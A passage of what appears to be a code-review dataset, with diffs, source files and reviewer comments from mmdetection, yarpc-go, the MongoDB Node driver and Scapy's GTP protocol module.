out_channels=256, featmap_strides=[4, 8, 16, 32]), mask_head=dict( type='FCNMaskHead', num_convs=4, in_channels=256, conv_out_channels=256, num_classes=81, loss_mask=dict( type='CrossEntropyLoss', use_mask=True, loss_weight=1.0))) # model training and testing settings train_cfg = dict( rpn=dict( assigner=dict( type='MaxIoUAssigner', pos_iou_thr=0.7, neg_iou_thr=0.3, min_pos_iou=0.3, ignore_iof_thr=-1), sampler=dict( type='RandomSampler', num=256, pos_fraction=0.5, neg_pos_ub=-1, add_gt_as_proposals=False), allowed_border=0, pos_weight=-1, debug=False), rpn_proposal=dict( nms_across_levels=False, nms_pre=2000, nms_post=2000, max_num=2000, nms_thr=0.7, min_bbox_size=0), rcnn=dict( assigner=dict( 
type='MaxIoUAssigner', pos_iou_thr=0.5, neg_iou_thr=0.5, min_pos_iou=0.5, ignore_iof_thr=-1), sampler=dict( type='RandomSampler', num=512, pos_fraction=0.25, neg_pos_ub=-1, add_gt_as_proposals=True), mask_size=28, pos_weight=-1, debug=False)) test_cfg = dict( rpn=dict( nms_across_levels=False, nms_pre=1000, nms_post=1000, max_num=1000, nms_thr=0.7, min_bbox_size=0), rcnn=dict( score_thr=0.05, nms=dict(type='nms', iou_thr=0.5), max_per_img=100, mask_thr_binary=0.5)) # dataset settings dataset_type = 'CocoDataset' data_root = 'data/coco/' img_norm_cfg = dict( mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True) albu_train_transforms = [ dict( type='ShiftScaleRotate', shift_limit=0.0625, scale_limit=0.0, rotate_limit=0, interpolation=1, p=0.5), dict( type='RandomBrightnessContrast', brightness_limit=[0.1, 0.3], contrast_limit=[0.1, 0.3], p=0.2), dict( type='OneOf', transforms=[ dict( type='RGBShift', r_shift_limit=10, g_shift_limit=10, b_shift_limit=10, p=1.0), dict( type='HueSaturationValue', hue_shift_limit=20, sat_shift_limit=30, val_shift_limit=20, p=1.0) ], p=0.1), dict(type='JpegCompression', quality_lower=85, quality_upper=95, p=0.2), dict(type='ChannelShuffle', p=0.1), dict( type='OneOf', transforms=[ dict(type='Blur', blur_limit=3, p=1.0), dict(type='MedianBlur', blur_limit=3, p=1.0) ], p=0.1), ] train_pipeline = [ dict(type='LoadImageFromFile'), dict(type='LoadAnnotations', with_bbox=True, with_mask=True), dict(type='Resize', img_scale=(1333, 800), keep_ratio=True), dict(type='Pad', size_divisor=32), dict( type='Albu', transforms=albu_train_transforms, bbox_params=dict( type='BboxParams', format='pascal_voc', label_fields=['gt_labels'], min_visibility=0.0, filter_lost_elements=True), keymap={ 'img': 'image', 'gt_masks': 'masks', 'gt_bboxes': 'bboxes' }, update_pad_shape=False, skip_img_without_anno=True), dict(type='Normalize', **img_norm_cfg), dict(type='DefaultFormatBundle'), dict( type='Collect', keys=['img', 'gt_bboxes', 'gt_labels', 
'gt_masks'], meta_keys=('filename', 'ori_shape', 'img_shape', 'img_norm_cfg', 'pad_shape', 'scale_factor')) ] test_pipeline = [ dict(type='LoadImageFromFile'), dict( type='MultiScaleFlipAug', img_scale=(1333, 800), flip=False, transforms=[ dict(type='Resize', keep_ratio=True), dict(type='RandomFlip'), dict(type='Normalize', **img_norm_cfg), dict(type='Pad', size_divisor=32), dict(type='ImageToTensor', keys=['img']), dict(type='Collect', keys=['img']), ]) ] data = dict( imgs_per_gpu=2, workers_per_gpu=2, train=dict( type=dataset_type, ann_file=data_root + 'annotations/instances_train2017.json', img_prefix=data_root + 'train2017/', pipeline=train_pipeline), val=dict( type=dataset_type, ann_file=data_root + 'annotations/instances_val2017.json', img_prefix=data_root + 'val2017/', pipeline=test_pipeline), test=dict( type=dataset_type, ann_file=data_root + 'annotations/instances_val2017.json', img_prefix=data_root + 'val2017/', pipeline=test_pipeline)) # optimizer optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001) optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2)) # learning policy lr_config = dict( policy='step', warmup='linear', warmup_iters=500, warmup_ratio=1.0 / 3, step=[8, 11]) checkpoint_config = dict(interval=1) # yapf:disable log_config = dict( interval=50, hooks=[ dict(type='TextLoggerHook'), # dict(type='TensorboardLoggerHook') ]) # yapf:enable evaluation = dict(interval=1) # runtime settings total_epochs = 12 dist_params = dict(backend='nccl') log_level = 'INFO' work_dir = './work_dirs/mask_rcnn_r50_fpn_1x' load_from = None resume_from = None workflow = [('train', 1)]
1
18,332
What is the reason to modify those things? I noticed it breaks the examples using `asyncio`
open-mmlab-mmdetection
py
@@ -33,7 +33,7 @@ import ( const ( // Encoding is the name of this encoding. - Encoding transport.Encoding = "protobuf" + Encoding transport.Encoding = "proto" rawResponseHeaderKey = "rpc-protobuf-raw-response" )
1
// Copyright (c) 2017 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. package protobuf import ( "context" "fmt" "go.uber.org/yarpc" "go.uber.org/yarpc/api/transport" "go.uber.org/yarpc/internal/procedure" "github.com/gogo/protobuf/proto" ) const ( // Encoding is the name of this encoding. Encoding transport.Encoding = "protobuf" rawResponseHeaderKey = "rpc-protobuf-raw-response" ) // SetRawResponse will set rawResponseHeaderKey to "true". // // rawResponseHeaderKey is a header key attached to either a request or // response that signals a UnaryHandler to not encode an application error // inside a wirepb.Response object, instead marshalling the actual response. 
// // Note per the documentation on transport.Headers#With, the returned Header // may not be the same as the input header, so the caller should always // update the header with: // // header = protobuf.SetRawResponse(header) func SetRawResponse(headers transport.Headers) transport.Headers { return headers.With(rawResponseHeaderKey, "1") } // ***all below functions should only be called by generated code*** // BuildProcedures builds the transport.Procedures. func BuildProcedures( serviceName string, methodNameToUnaryHandler map[string]transport.UnaryHandler, methodNameToOnewayHandler map[string]transport.OnewayHandler, ) []transport.Procedure { procedures := make([]transport.Procedure, 0, len(methodNameToUnaryHandler)) for methodName, unaryHandler := range methodNameToUnaryHandler { procedures = append( procedures, transport.Procedure{ Name: procedure.ToName(serviceName, methodName), HandlerSpec: transport.NewUnaryHandlerSpec(unaryHandler), Encoding: Encoding, }, ) } for methodName, onewayHandler := range methodNameToOnewayHandler { procedures = append( procedures, transport.Procedure{ Name: procedure.ToName(serviceName, methodName), HandlerSpec: transport.NewOnewayHandlerSpec(onewayHandler), Encoding: Encoding, }, ) } return procedures } // Client is a protobuf client. type Client interface { Call( ctx context.Context, requestMethodName string, request proto.Message, newResponse func() proto.Message, options ...yarpc.CallOption, ) (proto.Message, error) CallOneway( ctx context.Context, requestMethodName string, request proto.Message, options ...yarpc.CallOption, ) (transport.Ack, error) } // NewClient creates a new client. func NewClient(serviceName string, clientConfig transport.ClientConfig) Client { return newClient(serviceName, clientConfig) } // NewUnaryHandler returns a new UnaryHandler. 
func NewUnaryHandler( handle func(context.Context, proto.Message) (proto.Message, error), newRequest func() proto.Message, ) transport.UnaryHandler { return newUnaryHandler(handle, newRequest) } // NewOnewayHandler returns a new OnewayHandler. func NewOnewayHandler( handleOneway func(context.Context, proto.Message) error, newRequest func() proto.Message, ) transport.OnewayHandler { return newOnewayHandler(handleOneway, newRequest) } // CastError returns an error saying that generated code could not properly cast a proto.Message to it's expected type. func CastError(expectedType proto.Message, actualType proto.Message) error { return fmt.Errorf("expected proto.Message to have type %T but had type %T", expectedType, actualType) } func isRawResponse(headers transport.Headers) bool { rawResponse, ok := headers.Get(rawResponseHeaderKey) return ok && rawResponse == "1" } func getRawResponseHeaders() transport.Headers { return SetRawResponse(transport.Headers{}) }
1
13,718
WHOOOOOOOPS! so this is a wire protocol breaking change. I deployed a dev version of yarpc 1.9 to demo-yarpc-go and it caused bad request errors because it couldn't determine the procedure anymore. (in coordination with yarpc-prober)
yarpc-yarpc-go
go
@@ -1,5 +1,9 @@ 'use strict'; +const parseConnectionString = require('./core/uri_parser'); + +const writeConcernKeys = new Set(['w', 'wtimeout', 'j', 'fsync', 'wtimeoutMS', 'journal']); + /** * The **WriteConcern** class is a class that represents a MongoDB WriteConcern. * @class
1
'use strict'; /** * The **WriteConcern** class is a class that represents a MongoDB WriteConcern. * @class * @property {(number|string)} w The write concern * @property {number} wtimeout The write concern timeout * @property {boolean} j The journal write concern * @property {boolean} fsync The file sync write concern * @see https://docs.mongodb.com/manual/reference/write-concern/index.html */ class WriteConcern { /** * Constructs a WriteConcern from the write concern properties. * @param {(number|string)} [w] The write concern * @param {number} [wtimeout] The write concern timeout * @param {boolean} [j] The journal write concern * @param {boolean} [fsync] The file sync write concern */ constructor(w, wtimeout, j, fsync) { if (w != null) { this.w = w; } if (wtimeout != null) { this.wtimeout = wtimeout; } if (j != null) { this.j = j; } if (fsync != null) { this.fsync = fsync; } } /** * Construct a WriteConcern given an options object. * * @param {object} options The options object from which to extract the write concern. * @return {WriteConcern} */ static fromOptions(options) { if ( options == null || (options.writeConcern == null && options.w == null && options.wtimeout == null && options.j == null && options.fsync == null) ) { return; } if (options.writeConcern) { return new WriteConcern( options.writeConcern.w, options.writeConcern.wtimeout, options.writeConcern.j, options.writeConcern.fsync ); } return new WriteConcern(options.w, options.wtimeout, options.j, options.fsync); } } module.exports = WriteConcern;
1
16,463
if we keep this, can we stick to our convention of using UPPER_CASE for constants? Otherwise this looks like a floating variable to me.
mongodb-node-mongodb-native
js
@@ -341,7 +341,7 @@ class GTPPDUSessionContainer(Packet): return p def hashret(self): - return struct.pack("H", self.seq) + return struct.pack("H", getattr(self.underlayer, "seq")) class GTPEchoRequest(Packet):
1
# Copyright (C) 2018 Leonardo Monteiro <[email protected]> # 2017 Alexis Sultan <[email protected]> # 2017 Alessio Deiana <[email protected]> # 2014 Guillaume Valadon <[email protected]> # 2012 ffranz <[email protected]> ## # This program is published under a GPLv2 license # scapy.contrib.description = GPRS Tunneling Protocol (GTP) # scapy.contrib.status = loads from __future__ import absolute_import import struct from scapy.compat import chb, orb, bytes_encode from scapy.config import conf from scapy.error import warning from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ ConditionalField, FieldLenField, FieldListField, FlagsField, IntField, \ IPField, PacketListField, ShortField, StrFixedLenField, StrLenField, \ XBitField, XByteField, XIntField from scapy.layers.inet import IP, UDP from scapy.layers.inet6 import IPv6, IP6Field from scapy.layers.ppp import PPP from scapy.modules.six.moves import range from scapy.packet import bind_layers, bind_bottom_up, bind_top_down, \ Packet, Raw from scapy.volatile import RandInt, RandIP, RandNum, RandString # GTP Data types RATType = { 1: "UTRAN", 2: "GETRAN", 3: "WLAN", 4: "GAN", 5: "HSPA" } GTPmessageType = {1: "echo_request", 2: "echo_response", 16: "create_pdp_context_req", 17: "create_pdp_context_res", 18: "update_pdp_context_req", 19: "update_pdp_context_resp", 20: "delete_pdp_context_req", 21: "delete_pdp_context_res", 26: "error_indication", 27: "pdu_notification_req", 31: "supported_extension_headers_notification", 254: "end_marker", 255: "g_pdu"} IEType = {1: "Cause", 2: "IMSI", 3: "RAI", 4: "TLLI", 5: "P_TMSI", 8: "IE_ReorderingRequired", 14: "Recovery", 15: "SelectionMode", 16: "TEIDI", 17: "TEICP", 19: "TeardownInd", 20: "NSAPI", 26: "ChargingChrt", 27: "TraceReference", 28: "TraceType", 127: "ChargingId", 128: "EndUserAddress", 131: "AccessPointName", 132: "ProtocolConfigurationOptions", 133: "GSNAddress", 134: "MSInternationalNumber", 135: "QoS", 148: "CommonFlags", 149: 
"APNRestriction", 151: "RatType", 152: "UserLocationInformation", 153: "MSTimeZone", 154: "IMEI", 181: "MSInfoChangeReportingAction", 184: "BearerControlMode", 191: "EvolvedAllocationRetentionPriority", 255: "PrivateExtention"} CauseValues = {0: "Request IMSI", 1: "Request IMEI", 2: "Request IMSI and IMEI", 3: "No identity needed", 4: "MS Refuses", 5: "MS is not GPRS Responding", 128: "Request accepted", 129: "New PDP type due to network preference", 130: "New PDP type due to single address bearer only", 192: "Non-existent", 193: "Invalid message format", 194: "IMSI not known", 195: "MS is GPRS Detached", 196: "MS is not GPRS Responding", 197: "MS Refuses", 198: "Version not supported", 199: "No resources available", 200: "Service not supported", 201: "Mandatory IE incorrect", 202: "Mandatory IE missing", 203: "Optional IE incorrect", 204: "System failure", 205: "Roaming restriction", 206: "P-TMSI Signature mismatch", 207: "GPRS connection suspended", 208: "Authentication failure", 209: "User authentication failed", 210: "Context not found", 211: "All dynamic PDP addresses are occupied", 212: "No memory is available", 213: "Reallocation failure", 214: "Unknown mandatory extension header", 215: "Semantic error in the TFT operation", 216: "Syntactic error in TFT operation", 217: "Semantic errors in packet filter(s)", 218: "Syntactic errors in packet filter(s)", 219: "Missing or unknown APN", 220: "Unknown PDP address or PDP type", 221: "PDP context without TFT already activated", 222: "APN access denied : no subscription", 223: "APN Restriction type incompatibility with currently active PDP Contexts", # noqa: E501 224: "MS MBMS Capabilities Insufficient", 225: "Invalid Correlation : ID", 226: "MBMS Bearer Context Superseded", 227: "Bearer Control Mode violation", 228: "Collision with network initiated request"} Selection_Mode = {11111100: "MS or APN", 11111101: "MS", 11111110: "NET", 11111111: "FutureUse"} TrueFalse_value = {254: "False", 255: "True"} # 
http://www.arib.or.jp/IMT-2000/V720Mar09/5_Appendix/Rel8/29/29281-800.pdf ExtensionHeadersTypes = { 0: "No more extension headers", 1: "Reserved", 2: "Reserved", 64: "UDP Port", 133: "PDU Session Container", 192: "PDCP PDU Number", 193: "Reserved", 194: "Reserved" } class TBCDByteField(StrFixedLenField): def i2h(self, pkt, val): return val def m2i(self, pkt, val): ret = [] for v in val: byte = orb(v) left = byte >> 4 right = byte & 0xf if left == 0xf: ret.append(TBCD_TO_ASCII[right:right + 1]) else: ret += [ TBCD_TO_ASCII[right:right + 1], TBCD_TO_ASCII[left:left + 1] ] return b"".join(ret) def i2m(self, pkt, val): if not isinstance(val, bytes): val = bytes_encode(val) ret_string = b"" for i in range(0, len(val), 2): tmp = val[i:i + 2] if len(tmp) == 2: ret_string += chb(int(tmp[::-1], 16)) else: ret_string += chb(int(b"F" + tmp[:1], 16)) return ret_string TBCD_TO_ASCII = b"0123456789*#abc" class GTP_ExtensionHeader(Packet): @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt is None: return GTP_UDPPort_ExtensionHeader return cls class GTP_UDPPort_ExtensionHeader(GTP_ExtensionHeader): fields_desc = [ByteField("length", 0x40), ShortField("udp_port", None), ByteEnumField("next_ex", 0, ExtensionHeadersTypes), ] class GTP_PDCP_PDU_ExtensionHeader(GTP_ExtensionHeader): fields_desc = [ByteField("length", 0x01), ShortField("pdcp_pdu", None), ByteEnumField("next_ex", 0, ExtensionHeadersTypes), ] class GTPHeader(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP-C Header" fields_desc = [BitField("version", 1, 3), BitField("PT", 1, 1), BitField("reserved", 0, 1), BitField("E", 0, 1), BitField("S", 0, 1), BitField("PN", 0, 1), ByteEnumField("gtp_type", None, GTPmessageType), ShortField("length", None), IntField("teid", 0), ConditionalField(XBitField("seq", 0, 16), lambda pkt:pkt.E == 1 or pkt.S == 1 or pkt.PN == 1), # noqa: E501 ConditionalField(ByteField("npdu", 0), lambda pkt:pkt.E == 1 or pkt.S == 1 or pkt.PN == 1), # noqa: E501 
ConditionalField(ByteEnumField("next_ex", 0, ExtensionHeadersTypes), lambda pkt:pkt.E == 1 or pkt.S == 1 or pkt.PN == 1), ] # noqa: E501 def post_build(self, p, pay): p += pay if self.length is None: tmp_len = len(p) - 8 p = p[:2] + struct.pack("!H", tmp_len) + p[4:] return p def hashret(self): return struct.pack("B", self.version) + self.payload.hashret() def answers(self, other): return (isinstance(other, GTPHeader) and self.version == other.version and self.payload.answers(other.payload)) @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt and len(_pkt) >= 1: if (orb(_pkt[0]) >> 5) & 0x7 == 2: from . import gtp_v2 return gtp_v2.GTPHeader if _pkt and len(_pkt) >= 8: _gtp_type = orb(_pkt[1:2]) return GTPforcedTypes.get(_gtp_type, GTPHeader) return cls class GTP_U_Header(GTPHeader): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP-U Header" # GTP-U protocol is used to transmit T-PDUs between GSN pairs (or between an SGSN and an RNC in UMTS), # noqa: E501 # encapsulated in G-PDUs. A G-PDU is a packet including a GTP-U header and a T-PDU. The Path Protocol # noqa: E501 # defines the path and the GTP-U header defines the tunnel. Several tunnels may be multiplexed on a single path. 
# noqa: E501 def guess_payload_class(self, payload): # Snooped from Wireshark # https://github.com/boundary/wireshark/blob/07eade8124fd1d5386161591b52e177ee6ea849f/epan/dissectors/packet-gtp.c#L8195 # noqa: E501 if self.E == 1: if self.next_ex == 0x85: return GTPPDUSessionContainer return GTPHeader.guess_payload_class(self, payload) if self.gtp_type == 255: sub_proto = orb(payload[0]) if sub_proto >= 0x45 and sub_proto <= 0x4e: return IP elif (sub_proto & 0xf0) == 0x60: return IPv6 else: return PPP return GTPHeader.guess_payload_class(self, payload) # Some gtp_types have to be associated with a certain type of header GTPforcedTypes = { 16: GTPHeader, 17: GTPHeader, 18: GTPHeader, 19: GTPHeader, 20: GTPHeader, 21: GTPHeader, 26: GTP_U_Header, 27: GTPHeader, 254: GTP_U_Header, 255: GTP_U_Header } class GTPPDUSessionContainer(Packet): name = "GTP PDU Session Container" fields_desc = [ByteField("ExtHdrLen", None), BitField("type", 0, 4), BitField("spare1", 0, 4), BitField("P", 0, 1), BitField("R", 0, 1), BitField("QFI", 0, 6), ConditionalField(XBitField("PPI", 0, 3), lambda pkt: pkt.P == 1), ConditionalField(XBitField("spare2", 0, 5), lambda pkt: pkt.P == 1), ConditionalField(ByteField("pad1", 0), lambda pkt: pkt.P == 1), ConditionalField(ByteField("pad2", 0), lambda pkt: pkt.P == 1), ConditionalField(ByteField("pad3", 0), lambda pkt: pkt.P == 1), ConditionalField(StrLenField( "extraPadding", "", length_from=lambda pkt: 4 * (pkt.ExtHdrLen) - 4), lambda pkt: pkt.ExtHdrLen and pkt.ExtHdrLen > 1), ByteEnumField("NextExtHdr", 0, ExtensionHeadersTypes), ] def guess_payload_class(self, payload): if self.NextExtHdr == 0: sub_proto = orb(payload[0]) if sub_proto >= 0x45 and sub_proto <= 0x4e: return IP elif (sub_proto & 0xf0) == 0x60: return IPv6 else: return PPP return GTPHeader.guess_payload_class(self, payload) def post_build(self, p, pay): p += pay if self.ExtHdrLen is None: if self.P == 1: hdr_len = 2 else: hdr_len = 1 p = struct.pack("!B", hdr_len) + p[1:] return p def 
hashret(self): return struct.pack("H", self.seq) class GTPEchoRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Echo Request" def hashret(self): return struct.pack("H", self.seq) class IE_Base(Packet): def extract_padding(self, pkt): return "", pkt def post_build(self, p, pay): if self.fields_desc[1].name == "length": if self.length is None: tmp_len = len(p) if isinstance(self.payload, conf.padding_layer): tmp_len += len(self.payload.load) p = p[:1] + struct.pack("!H", tmp_len - 2) + p[3:] return p + pay class IE_Cause(IE_Base): name = "Cause" fields_desc = [ByteEnumField("ietype", 1, IEType), ByteEnumField("CauseValue", None, CauseValues)] class IE_IMSI(IE_Base): name = "IMSI - Subscriber identity of the MS" fields_desc = [ByteEnumField("ietype", 2, IEType), TBCDByteField("imsi", str(RandNum(0, 999999999999999)), 8)] class IE_Routing(IE_Base): name = "Routing Area Identity" fields_desc = [ByteEnumField("ietype", 3, IEType), TBCDByteField("MCC", "", 2), # MNC: if the third digit of MCC is 0xf, # then the length of MNC is 1 byte TBCDByteField("MNC", "", 1), ShortField("LAC", None), ByteField("RAC", None)] class IE_ReorderingRequired(IE_Base): name = "Recovery" fields_desc = [ByteEnumField("ietype", 8, IEType), ByteEnumField("reordering_required", 254, TrueFalse_value)] class IE_Recovery(IE_Base): name = "Recovery" fields_desc = [ByteEnumField("ietype", 14, IEType), ByteField("restart_counter", 24)] class IE_SelectionMode(IE_Base): # Indicates the origin of the APN in the message name = "Selection Mode" fields_desc = [ByteEnumField("ietype", 15, IEType), BitEnumField("SelectionMode", "MS or APN", 8, Selection_Mode)] class IE_TEIDI(IE_Base): name = "Tunnel Endpoint Identifier Data" fields_desc = [ByteEnumField("ietype", 16, IEType), XIntField("TEIDI", RandInt())] class IE_TEICP(IE_Base): name = "Tunnel Endpoint Identifier Control Plane" fields_desc = [ByteEnumField("ietype", 17, IEType), XIntField("TEICI", RandInt())] class IE_Teardown(IE_Base): name = 
"Teardown Indicator" fields_desc = [ByteEnumField("ietype", 19, IEType), ByteEnumField("indicator", "True", TrueFalse_value)] class IE_NSAPI(IE_Base): # Identifies a PDP context in a mobility management context specified by TEICP # noqa: E501 name = "NSAPI" fields_desc = [ByteEnumField("ietype", 20, IEType), XBitField("sparebits", 0x0000, 4), XBitField("NSAPI", RandNum(0, 15), 4)] class IE_ChargingCharacteristics(IE_Base): # Way of informing both the SGSN and GGSN of the rules for name = "Charging Characteristics" fields_desc = [ByteEnumField("ietype", 26, IEType), # producing charging information based on operator configured triggers. # noqa: E501 # 0000 .... .... .... : spare # .... 1... .... .... : normal charging # .... .0.. .... .... : prepaid charging # .... ..0. .... .... : flat rate charging # .... ...0 .... .... : hot billing charging # .... .... 0000 0000 : reserved XBitField("Ch_ChSpare", None, 4), XBitField("normal_charging", None, 1), XBitField("prepaid_charging", None, 1), XBitField("flat_rate_charging", None, 1), XBitField("hot_billing_charging", None, 1), XBitField("Ch_ChReserved", 0, 8)] class IE_TraceReference(IE_Base): # Identifies a record or a collection of records for a particular trace. name = "Trace Reference" fields_desc = [ByteEnumField("ietype", 27, IEType), XBitField("Trace_reference", None, 16)] class IE_TraceType(IE_Base): # Indicates the type of the trace name = "Trace Type" fields_desc = [ByteEnumField("ietype", 28, IEType), XBitField("Trace_type", None, 16)] class IE_ChargingId(IE_Base): name = "Charging ID" fields_desc = [ByteEnumField("ietype", 127, IEType), XIntField("Charging_id", RandInt())] class IE_EndUserAddress(IE_Base): # Supply protocol specific information of the external packet name = "End User Address" fields_desc = [ByteEnumField("ietype", 128, IEType), # data network accessed by the GGPRS subscribers. 
# - Request # 1 Type (1byte) # 2-3 Length (2bytes) - value 2 # 4 Spare + PDP Type Organization # 5 PDP Type Number # - Response # 6-n PDP Address ShortField("length", 2), BitField("SPARE", 15, 4), BitField("PDPTypeOrganization", 1, 4), XByteField("PDPTypeNumber", None), ConditionalField(IPField("PDPAddress", RandIP()), lambda pkt: pkt.length == 6 or pkt.length == 22), # noqa: E501 ConditionalField(IP6Field("IPv6_PDPAddress", '::1'), lambda pkt: pkt.length == 18 or pkt.length == 22)] # noqa: E501 class APNStrLenField(StrLenField): # Inspired by DNSStrField def m2i(self, pkt, s): ret_s = b"" tmp_s = s while tmp_s: tmp_len = orb(tmp_s[0]) + 1 if tmp_len > len(tmp_s): warning("APN prematured end of character-string (size=%i, remaining bytes=%i)" % (tmp_len, len(tmp_s))) # noqa: E501 ret_s += tmp_s[1:tmp_len] tmp_s = tmp_s[tmp_len:] if len(tmp_s): ret_s += b"." s = ret_s return s def i2m(self, pkt, s): if not isinstance(s, bytes): s = bytes_encode(s) s = b"".join(chb(len(x)) + x for x in s.split(b".")) return s class IE_AccessPointName(IE_Base): # Sent by SGSN or by GGSN as defined in 3GPP TS 23.060 name = "Access Point Name" fields_desc = [ByteEnumField("ietype", 131, IEType), ShortField("length", None), APNStrLenField("APN", "nternet", length_from=lambda x: x.length)] # noqa: E501 def post_build(self, p, pay): if self.length is None: tmp_len = len(p) - 3 p = p[:2] + struct.pack("!B", tmp_len) + p[3:] return p class IE_ProtocolConfigurationOptions(IE_Base): name = "Protocol Configuration Options" fields_desc = [ByteEnumField("ietype", 132, IEType), ShortField("length", 4), StrLenField("Protocol_Configuration", "", length_from=lambda x: x.length)] class IE_GSNAddress(IE_Base): name = "GSN Address" fields_desc = [ByteEnumField("ietype", 133, IEType), ShortField("length", None), ConditionalField(IPField("ipv4_address", RandIP()), lambda pkt: pkt.length == 4), ConditionalField(IP6Field("ipv6_address", '::1'), lambda pkt: pkt.length == 16)] def post_build(self, p, pay): if 
self.length is None: tmp_len = len(p) - 3 p = p[:2] + struct.pack("!B", tmp_len) + p[3:] return p class IE_MSInternationalNumber(IE_Base): name = "MS International Number" fields_desc = [ByteEnumField("ietype", 134, IEType), ShortField("length", None), FlagsField("flags", 0x91, 8, ["Extension", "", "", "International Number", "", "", "", "ISDN numbering"]), # noqa: E501 TBCDByteField("digits", "33607080910", length_from=lambda x: x.length - 1)] # noqa: E501 class QoS_Profile(IE_Base): name = "QoS profile" fields_desc = [ByteField("qos_ei", 0), ByteField("length", None), XBitField("spare", 0x00, 2), XBitField("delay_class", 0x000, 3), XBitField("reliability_class", 0x000, 3), XBitField("peak_troughput", 0x0000, 4), BitField("spare", 0, 1), XBitField("precedence_class", 0x000, 3), XBitField("spare", 0x000, 3), XBitField("mean_troughput", 0x00000, 5), XBitField("traffic_class", 0x000, 3), XBitField("delivery_order", 0x00, 2), XBitField("delivery_of_err_sdu", 0x000, 3), ByteField("max_sdu_size", None), ByteField("max_bitrate_up", None), ByteField("max_bitrate_down", None), XBitField("redidual_ber", 0x0000, 4), XBitField("sdu_err_ratio", 0x0000, 4), XBitField("transfer_delay", 0x00000, 5), XBitField("traffic_handling_prio", 0x000, 3), ByteField("guaranteed_bit_rate_up", None), ByteField("guaranteed_bit_rate_down", None)] class IE_QoS(IE_Base): name = "QoS" fields_desc = [ByteEnumField("ietype", 135, IEType), ShortField("length", None), ByteField("allocation_retention_prioiry", 1), ConditionalField(XBitField("spare", 0x00, 2), lambda p: p.length and p.length > 1), ConditionalField(XBitField("delay_class", 0x000, 3), lambda p: p.length and p.length > 1), ConditionalField(XBitField("reliability_class", 0x000, 3), lambda p: p.length and p.length > 1), ConditionalField(XBitField("peak_troughput", 0x0000, 4), lambda p: p.length and p.length > 2), ConditionalField(BitField("spare", 0, 1), lambda p: p.length and p.length > 2), ConditionalField(XBitField("precedence_class", 
0x000, 3), lambda p: p.length and p.length > 2), ConditionalField(XBitField("spare", 0x000, 3), lambda p: p.length and p.length > 3), ConditionalField(XBitField("mean_troughput", 0x00000, 5), lambda p: p.length and p.length > 3), ConditionalField(XBitField("traffic_class", 0x000, 3), lambda p: p.length and p.length > 4), ConditionalField(XBitField("delivery_order", 0x00, 2), lambda p: p.length and p.length > 4), ConditionalField(XBitField("delivery_of_err_sdu", 0x000, 3), lambda p: p.length and p.length > 4), ConditionalField(ByteField("max_sdu_size", None), lambda p: p.length and p.length > 5), ConditionalField(ByteField("max_bitrate_up", None), lambda p: p.length and p.length > 6), ConditionalField(ByteField("max_bitrate_down", None), lambda p: p.length and p.length > 7), ConditionalField(XBitField("redidual_ber", 0x0000, 4), lambda p: p.length and p.length > 8), ConditionalField(XBitField("sdu_err_ratio", 0x0000, 4), lambda p: p.length and p.length > 8), ConditionalField(XBitField("transfer_delay", 0x00000, 6), lambda p: p.length and p.length > 9), ConditionalField(XBitField("traffic_handling_prio", 0x000, 2), lambda p: p.length and p.length > 9), ConditionalField(ByteField("guaranteed_bit_rate_up", None), lambda p: p.length and p.length > 10), ConditionalField(ByteField("guaranteed_bit_rate_down", None), lambda p: p.length and p.length > 11), ConditionalField(XBitField("spare", 0x000, 3), lambda p: p.length and p.length > 12), ConditionalField(BitField("signaling_indication", 0, 1), lambda p: p.length and p.length > 12), ConditionalField(XBitField("source_stats_desc", 0x0000, 4), lambda p: p.length and p.length > 12), ConditionalField(ByteField("max_bitrate_down_ext", None), lambda p: p.length and p.length > 13), ConditionalField(ByteField("guaranteed_bitrate_down_ext", None), lambda p: p.length and p.length > 14), ConditionalField(ByteField("max_bitrate_up_ext", None), lambda p: p.length and p.length > 15), 
ConditionalField(ByteField("guaranteed_bitrate_up_ext", None), lambda p: p.length and p.length > 16), ConditionalField(ByteField("max_bitrate_down_ext2", None), lambda p: p.length and p.length > 17), ConditionalField(ByteField("guaranteed_bitrate_down_ext2", None), lambda p: p.length and p.length > 18), ConditionalField(ByteField("max_bitrate_up_ext2", None), lambda p: p.length and p.length > 19), ConditionalField(ByteField("guaranteed_bitrate_up_ext2", None), lambda p: p.length and p.length > 20)] class IE_CommonFlags(IE_Base): name = "Common Flags" fields_desc = [ByteEnumField("ietype", 148, IEType), ShortField("length", None), BitField("dual_addr_bearer_fl", 0, 1), BitField("upgrade_qos_supported", 0, 1), BitField("nrsn", 0, 1), BitField("no_qos_nego", 0, 1), BitField("mbms_cnting_info", 0, 1), BitField("ran_procedure_ready", 0, 1), BitField("mbms_service_type", 0, 1), BitField("prohibit_payload_compression", 0, 1)] class IE_APNRestriction(IE_Base): name = "APN Restriction" fields_desc = [ByteEnumField("ietype", 149, IEType), ShortField("length", 1), ByteField("restriction_type_value", 0)] class IE_RATType(IE_Base): name = "Rat Type" fields_desc = [ByteEnumField("ietype", 151, IEType), ShortField("length", 1), ByteEnumField("RAT_Type", None, RATType)] class IE_UserLocationInformation(IE_Base): name = "User 